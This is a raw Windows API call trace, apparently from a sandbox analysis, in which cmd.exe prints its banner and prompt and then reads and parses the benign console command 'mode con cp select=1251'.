lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a886340, nSize=0x2000, Arguments=0x1cf680 | out: lpBuffer="Microsoft Windows [Version 6.1.7601]") returned 0x24 [0266.791] _get_osfhandle (_FileHandle=1) returned 0xf4 [0266.791] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 6.1.7601]", cchWideChar=-1, lpMultiByteStr=0x4a87c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 6.1.7601]", lpUsedDefaultChar=0x0) returned 37 [0266.792] WriteFile (in: hFile=0xf4, lpBuffer=0x4a87c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x1cf608, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesWritten=0x1cf608*=0x24, lpOverlapped=0x0) returned 1 [0266.792] _vsnwprintf (in: _Buffer=0x4a886340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1cf6a8 | out: _Buffer="\r\n") returned 2 [0266.792] _get_osfhandle (_FileHandle=1) returned 0xf4 [0266.792] GetFileType (hFile=0xf4) returned 0x3 [0266.792] _get_osfhandle (_FileHandle=1) returned 0xf4 [0266.792] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a87c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0266.792] WriteFile (in: hFile=0xf4, lpBuffer=0x4a87c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1cf678, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesWritten=0x1cf678*=0x2, lpOverlapped=0x0) returned 1 [0266.792] _vsnwprintf (in: _Buffer=0x4a886340, _BufferCount=0x1fff, _Format="%s", _ArgList=0x1cf6a8 | out: _Buffer="Copyright (c) 2009 Microsoft Corporation. All rights reserved.") returned 63 [0266.792] _get_osfhandle (_FileHandle=1) returned 0xf4 [0266.792] GetFileType (hFile=0xf4) returned 0x3 [0266.792] _get_osfhandle (_FileHandle=1) returned 0xf4 [0266.792] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x4a87c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 64 [0266.792] WriteFile (in: hFile=0xf4, lpBuffer=0x4a87c320*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x1cf678, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesWritten=0x1cf678*=0x3f, lpOverlapped=0x0) returned 1 [0266.792] _vsnwprintf (in: _Buffer=0x4a886340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1cf6a8 | out: _Buffer="\r\n") returned 2 [0266.792] _get_osfhandle (_FileHandle=1) returned 0xf4 [0266.792] GetFileType (hFile=0xf4) returned 0x3 [0266.792] _get_osfhandle (_FileHandle=1) returned 0xf4 [0266.792] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a87c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0266.792] WriteFile (in: hFile=0xf4, lpBuffer=0x4a87c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1cf678, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesWritten=0x1cf678*=0x2, lpOverlapped=0x0) returned 1 [0266.793] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77ad0000 [0266.793] GetProcAddress (hModule=0x77ad0000, lpProcName="CopyFileExW") returned 0x77ae23d0 [0266.793] GetProcAddress (hModule=0x77ad0000, lpProcName="IsDebuggerPresent") returned 0x77ad8290 [0266.793] GetProcAddress (hModule=0x77ad0000, lpProcName="SetConsoleInputExeNameW") returned 0x77ae17e0 [0266.793] _get_osfhandle (_FileHandle=0) returned 0xe8 [0266.793] GetFileType (hFile=0xe8) returned 0x3 [0266.793] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0266.793] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x1cf4d0 | out: TokenHandle=0x1cf4d0*=0x0) returned 0xc000007c [0266.793] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x1cf4d0 | out: TokenHandle=0x1cf4d0*=0x50) returned 0x0 [0266.793] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x12, TokenInformation=0x1cf4e0, TokenInformationLength=0x4, ReturnLength=0x1cf4e8 | out: TokenInformation=0x1cf4e0, ReturnLength=0x1cf4e8) returned 0x0 [0267.086] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x1a, TokenInformation=0x1cf4e8, TokenInformationLength=0x4, ReturnLength=0x1cf4e0 | out: TokenInformation=0x1cf4e8, ReturnLength=0x1cf4e0) returned 0x0 [0267.086] NtClose (Handle=0x50) returned 0x0 [0267.087] GetProcessHeap () returned 0x220000 [0267.087] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23aae0 | out: hHeap=0x220000) returned 1 [0267.282] _vsnwprintf (in: _Buffer=0x4a886340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1cf1e8 | out: _Buffer="\r\n") returned 2 [0267.282] _get_osfhandle (_FileHandle=1) returned 0xf4 [0267.282] GetFileType (hFile=0xf4) returned 0x3 [0267.282] _get_osfhandle (_FileHandle=1) returned 0xf4 [0267.282] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a87c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0267.282] WriteFile (in: hFile=0xf4, lpBuffer=0x4a87c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1cf1b8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesWritten=0x1cf1b8*=0x2, lpOverlapped=0x0) returned 1 [0267.282] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a86f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0267.282] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a87c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0267.282] _vsnwprintf (in: _Buffer=0x4a86eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1cf1f8 | out: _Buffer="C:\\Windows\\system32") returned 19 [0267.282] _vsnwprintf (in: _Buffer=0x4a86eb86, _BufferCount=0x3eb, _Format="%c", _ArgList=0x1cf1f8 | out: _Buffer=">") returned 1 [0267.282] _get_osfhandle (_FileHandle=1) returned 0xf4 [0267.282] GetFileType (hFile=0xf4) returned 0x3 [0267.282] _get_osfhandle (_FileHandle=1) returned 0xf4 [0267.283] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32>", cchWideChar=-1, lpMultiByteStr=0x4a87c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32>", lpUsedDefaultChar=0x0) returned 21 [0267.283] WriteFile (in: hFile=0xf4, lpBuffer=0x4a87c320*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x1cf1e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesWritten=0x1cf1e8*=0x14, lpOverlapped=0x0) returned 1 [0267.283] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.283] GetFileType (hFile=0xe8) returned 0x3 [0267.283] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.283] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.283] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.283] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e320, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0267.283] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.283] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.283] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.283] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e322, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0267.283] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.283] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.283] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.283] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e324, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0267.283] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.283] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.283] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.283] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e326, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0267.283] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.283] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.283] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.283] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e328, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0267.284] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.284] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.284] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.284] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e32a, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0267.284] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.284] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.284] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.284] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e32c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0267.284] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.284] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.284] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.284] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e32e, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0267.284] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.284] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.284] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.284] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e330, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0267.284] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.284] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.284] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.284] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e332, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0267.284] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.284] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.284] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.284] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e334, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0267.284] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.284] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.284] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.284] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e336, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0267.284] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.284] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.284] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.284] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e338, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0267.284] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.284] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.284] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.284] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e33a, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0267.284] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.284] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.284] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.284] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e33c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0267.284] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.284] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.284] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.284] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e33e, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0267.285] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.285] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.285] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.285] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e340, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0267.285] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.285] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.285] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.285] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e342, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0267.285] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.285] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.285] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.285] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e344, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0267.285] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.285] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.285] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.285] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e346, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0267.285] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.285] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.285] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.285] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e348, cchWideChar=1 | out: lpWideCharStr="2") returned 1 [0267.285] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.285] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.285] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.285] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e34a, cchWideChar=1 | out: lpWideCharStr="5") returned 1 [0267.285] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.285] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.285] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.285] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e34c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0267.285] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.285] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.285] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.285] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e34e, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0267.286] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.286] GetFileType (hFile=0xe8) returned 0x3 [0267.286] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.286] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.286] _get_osfhandle (_FileHandle=1) returned 0xf4 [0267.286] GetFileType (hFile=0xf4) returned 0x3 [0267.286] _get_osfhandle (_FileHandle=1) returned 0xf4 [0267.286] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="mode con cp select=1251\n", cchWideChar=-1, lpMultiByteStr=0x4a87c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mode con cp select=1251\n", lpUsedDefaultChar=0x0) returned 25 [0267.286] WriteFile (in: hFile=0xf4, lpBuffer=0x4a87c320*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x1cf4c8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesWritten=0x1cf4c8*=0x18, lpOverlapped=0x0) returned 1 [0267.286] GetProcessHeap () returned 0x220000 [0267.286] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x4012) returned 0x23b310 [0267.286] GetProcessHeap () returned 0x220000 [0267.286] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23b310 | out: hHeap=0x220000) returned 1 [0267.286] _wcsicmp (_String1="mode", _String2=")") returned 68 [0267.286] _wcsicmp (_String1="FOR", _String2="mode") returned -7 [0267.286] _wcsicmp (_String1="FOR/?", _String2="mode") returned -7 [0267.286] _wcsicmp (_String1="IF", _String2="mode") returned -4 [0267.286] _wcsicmp (_String1="IF/?", _String2="mode") returned -4 [0267.286] _wcsicmp (_String1="REM", _String2="mode") returned 5 [0267.286] _wcsicmp (_String1="REM/?", _String2="mode") returned 5 [0267.287] GetProcessHeap () returned 0x220000 [0267.287] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xb0) returned 0x239840 [0267.287] GetProcessHeap () returned 0x220000 [0267.287] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x1a) returned 0x234630 [0267.287] GetProcessHeap () returned 0x220000 [0267.287] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x38) returned 0x236550 [0267.288] GetConsoleOutputCP () returned 0x1b5 [0267.288] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a87bfe0 | out: lpCPInfo=0x4a87bfe0) returned 1 [0267.288] SetThreadUILanguage 